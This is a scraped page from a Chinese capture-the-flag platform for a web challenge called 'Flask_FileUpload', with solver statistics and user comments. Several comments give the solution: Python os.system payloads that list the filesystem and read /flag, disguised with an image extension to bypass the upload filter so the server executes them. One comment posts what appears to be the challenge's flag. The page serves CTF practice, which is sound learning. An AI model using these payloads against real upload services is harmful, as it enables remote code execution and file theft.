Flask_FileUploadWEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
⎝Lazzaro⎠
一血奖励:
3金币
解 决:
11024
提 示:
描 述:
Flask_FileUpload
评分(19)
解题动态
CLX1216115 攻破了该题 1小时前
ArthurMorgan 攻破了该题 1小时前
montgo 攻破了该题 1小时前
江户川 攻破了该题 1小时前
1554701214 攻破了该题 14小时前
13627713954 攻破了该题 15小时前
viator 攻破了该题 15小时前
to5ny 攻破了该题 19小时前
小白出道 攻破了该题 20小时前
foamsn 攻破了该题 20小时前
Testman 攻破了该题 20小时前
2875517502 攻破了该题 21小时前
scicoc 攻破了该题 21小时前
star_evil 攻破了该题 21小时前
sscx_xxy 攻破了该题 21小时前
2276491734 攻破了该题 22小时前
salmon 攻破了该题 22小时前
林士仲11 攻破了该题 1天前
19163302825 攻破了该题 1天前
评论
Cat00011cat 1年前
举报
import os os.system('ls / -l') os.system('cat /flag')
nf1y 1年前
举报
为啥我返回包出现的是这样 File "/app/upload/test.jpg", line 1 SyntaxError: Non-UTF-8 code starting with '\xff' in file /app/upload/test.jpg on line 1, but no encoding declared; see http://python.org/de
不知名学渣 1年前
举报
@aWxvdmVjdGY 我是小白,请问大佬,我很好奇为什么传图片就会以代码形式执行,那么这个实现是类似apache的解析漏洞吗?
aWxvdmVjdGY 1年前
举报
1、<input type="file" name="file" accept=".jpg,.png">这里限制了格式,后端也会检查。需要将py文件后缀为png,然后上传会议python文件执行
白猫a 1年前
举报
这个作者可以哇,题目解的真精彩!!!
gfpeak 1年前
举报
<!-- flag{9e5c134c066dc490c9644ecd9655a482} -->
aWxvdmVjdGY 1年前
举报
不同的场景答案是不一样的
2224525664 1年前
举报
我只想说牛逼!!!!来自小白的感叹
18196731832 1年前
举报
注意换行
aWxvdmVjdGY 1年前
举报
用python开发工具写就好了
甜甜 1年前
举报
恍然大悟呀
丶我亚索贼六 1年前
举报
import os os.system('cat /flag')
玲珑湾 1年前
举报
话说传个马上去会怎样
admin999 1年前
举报
传了php上去提示ValueError: too many values to unpack (expected 2) // Werkzeug Debugger
66295112 1年前
举报
常规 按F12,看到一句话,你所上传的文件都会以python的方式返回结果。 哦了,然后上传 ,首先创建一个a.txt,写入 import os os.system('find / -name flag') //查找flag所在文件路径 然后改后缀为png即a.png后以图片上传,代码被执行,发现 /flag 在notepadd++中打开a.png,在后面添加一行 os.sy
kaer 1年前
举报
import os os.system('ls / -l') 命名为dir.png import os os.system('cat /flag') 命名为flag.png 上传两次 ls / -l 列举出文件的类型可以看出flag不是目录文件